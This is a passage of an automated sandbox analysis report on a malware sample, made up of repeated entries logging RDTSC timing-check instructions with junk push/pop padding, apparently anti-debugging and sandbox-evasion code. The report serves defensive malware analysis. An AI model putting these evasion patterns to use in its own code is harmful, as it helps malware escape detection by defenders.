                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C8463 second address: 11C846E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C846E second address: 11C8472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C8472 second address: 11C8478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C85E2 second address: 11C85E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C85E8 second address: 11C85EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C8739 second address: 11C8792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD826h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jnp 00007FD6F84FD816h 0x00000013 jno 00007FD6F84FD816h 0x00000019 jmp 00007FD6F84FD820h 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007FD6F84FD829h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C8792 second address: 11C8798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C8798 second address: 11C87BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD6F84FD827h 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FD6F84FD816h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11C87BF second address: 11C87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 114BF31 second address: 114BF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11CF47B second address: 11CF480 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11CF480 second address: 11CF48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1155C7C second address: 1155C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D4DA3 second address: 11D4DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D4DA9 second address: 11D4DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D4DAE second address: 11D4DB8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD6F84FD81Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CB4 second address: 11D3CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CBC second address: 11D3CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CC0 second address: 11D3CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FD6F84FEE6Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CD0 second address: 11D3CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CDB second address: 11D3CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CE6 second address: 11D3CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D3CEC second address: 11D3CF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FD6F84FEE66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D380D second address: 11D3811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DA6D6 second address: 11DA6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D91E5 second address: 11D91F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD6F84FD816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D91F1 second address: 11D9207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE70h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D94D8 second address: 11D94E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FD816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D94E2 second address: 11D94E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9654 second address: 11D966B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FD81Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D97BF second address: 11D97CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD6F84FEE68h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9925 second address: 11D9969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FD6F84FD816h 0x00000009 jo 00007FD6F84FD816h 0x0000000f jnl 00007FD6F84FD816h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007FD6F84FD82Bh 0x00000020 jmp 00007FD6F84FD81Fh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9A9C second address: 11D9AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9AA0 second address: 11D9AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9AA4 second address: 11D9AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD6F84FEE79h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9AC7 second address: 11D9AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD6F84FD816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11D9AD1 second address: 11D9AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119677C second address: 1173375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb di, 4F4Dh 0x0000000d call dword ptr [ebp+122D296Ah] 0x00000013 jmp 00007FD6F84FD81Fh 0x00000018 jo 00007FD6F84FD837h 0x0000001e jmp 00007FD6F84FD823h 0x00000023 push ecx 0x00000024 je 00007FD6F84FD816h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1196D01 second address: 1196D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1196D05 second address: 1196D29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 mov edx, 0A9358F6h 0x0000000d push F294BC26h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD6F84FD81Fh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1197522 second address: 1197527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1197527 second address: 119752D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119752D second address: 1197531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1197531 second address: 1197550 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD6F84FD81Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1197550 second address: 119755A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119755A second address: 11975AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FD82Dh 0x00000008 jmp 00007FD6F84FD827h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD6F84FD818h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 0000001Eh 0x0000002c jmp 00007FD6F84FD81Ah 0x00000031 push eax 0x00000032 push ecx 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11976AE second address: 11976B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11976B5 second address: 11976BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11976BB second address: 11976BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11976BF second address: 11976DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD822h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11976DE second address: 11976E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE442 second address: 11DE446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE446 second address: 11DE452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE452 second address: 11DE458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE458 second address: 11DE46E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD6F84FEE6Ch 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE5C4 second address: 11DE5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE5CA second address: 11DE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FD6F84FEE66h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE5DE second address: 11DE600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD828h 0x00000007 jo 00007FD6F84FD816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DE767 second address: 11DE781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD6F84FEE6Bh 0x0000000c jng 00007FD6F84FEE6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DEA65 second address: 11DEA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FD6F84FD816h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DEBC3 second address: 11DEBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE6Fh 0x00000007 jmp 00007FD6F84FEE78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FD6F84FEE6Ah 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DEBFC second address: 11DEC44 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FD818h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD6F84FD825h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FD6F84FD824h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD6F84FD81Ch 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DEDE3 second address: 11DEDE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11DEDE9 second address: 11DEE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD6F84FD81Ah 0x0000000c push ebx 0x0000000d jmp 00007FD6F84FD823h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007FD6F84FD82Ch 0x0000001e jmp 00007FD6F84FD826h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E2010 second address: 11E2020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD6F84FEE66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E2020 second address: 11E202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD6F84FD816h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E202F second address: 11E2033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E5444 second address: 11E5448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E4CD6 second address: 11E4CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FEE72h 0x00000009 popad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E4FC1 second address: 11E4FE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FD6F84FD816h 0x00000009 jns 00007FD6F84FD816h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD6F84FD81Bh 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E4FE3 second address: 11E5002 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD6F84FEE66h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD6F84FEE6Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E512C second address: 11E5132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E5132 second address: 11E513D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E513D second address: 11E514A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E514A second address: 11E516B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FD6F84FEE78h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E516B second address: 11E5175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD6F84FD816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E5175 second address: 11E5189 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FD6F84FEE66h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E93F4 second address: 11E9409 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FD816h 0x00000008 jp 00007FD6F84FD816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D4F second address: 11E8D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D55 second address: 11E8D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D59 second address: 11E8D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D5D second address: 11E8D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D69 second address: 11E8D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D6D second address: 11E8D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E8D71 second address: 11E8DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FEE70h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD6F84FEE72h 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E907B second address: 11E90A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD6F84FD82Dh 0x00000010 jmp 00007FD6F84FD827h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11E90A5 second address: 11E90C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD6F84FEE66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD6F84FEE72h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11EC932 second address: 11EC93C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FD816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
